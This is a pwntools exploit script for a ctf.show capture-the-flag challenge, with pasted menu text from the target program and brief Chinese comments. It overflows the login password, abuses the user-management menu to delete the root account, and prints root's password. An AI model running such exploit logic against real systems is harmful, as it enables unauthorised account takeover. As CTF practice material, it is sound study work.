#create user&password -> login -> validate psn session -> delete root -> show root passwd
from pwn import *
p = remote("pwn.challenge.ctf.show",28156)
#-----main -> menu
#-----from main
#-----create_new_user
p.sendline('1')
p.recvuntil('username :')
p.sendline('pwn')#随便取一个名?
#p.sendlineafter('username :','pwn')
p.recvuntil('password :')
p.sendline('A'*0x18)#限制是0x18
#p.sendlineafter('password :','a'*0x18)#change_passwd
#-----login
p.sendline('2')
p.recvuntil('Username :')
p.sendline('pwn')#前面自己取的那个name
#p.sendlineafter('Username : ','pwn')
p.recvuntil('Password :')
p.sendline('A'*1023)#I don't know why
#p.sendlineafter('Password : ',"'a'*1023")这里不能使用sendlineafter
#-----to menu
#-----manage users
p.sendline('3')
#p.recvuntil('modify :')
#p.sendline('pwn')
p.sendlineafter('modify :','pwn')
#p.recvuntil('>')
#p.sendline('3')
p.sendlineafter('>','3')#i=-1 -> print('>') -> end change_user_admin
#-----delete account
p.sendline('4')
#p.recvuntil('delete :')
#p.sendline('root')
p.sendlineafter('delete :','root')
#-----show my data
p.sendline('3')
p.recvuntil("Password : ")
print(p.recv())
#p.close()
\n\nPlease choose an option between the following : \n
1 : create an user\n
2 : login\n
0 : exit\n>
由此可知,需要执行先创建一个user,然后登录,也就是说要v3 == 1,然后v3 ==2.
Actions :\n
1 : create new user\n
2 : list users\n
3 : manage users\n
4 : delete account\n
0 : Logout\n>
"Actions :\n"
" 1 : show messages\n"
" 2 : add message\n"
" 3 : show my data\n"
" 4 : change password\n"
" 5 : delete account\n"
" 0 : Logout\n"
"> "
"Your account is not activated.\n"
"Please contact an admin to activate it\n"
"Actions :\n"
" 1 : change password\n"
" 2 : delete account\n"
" 0 : Logout\n"
"> "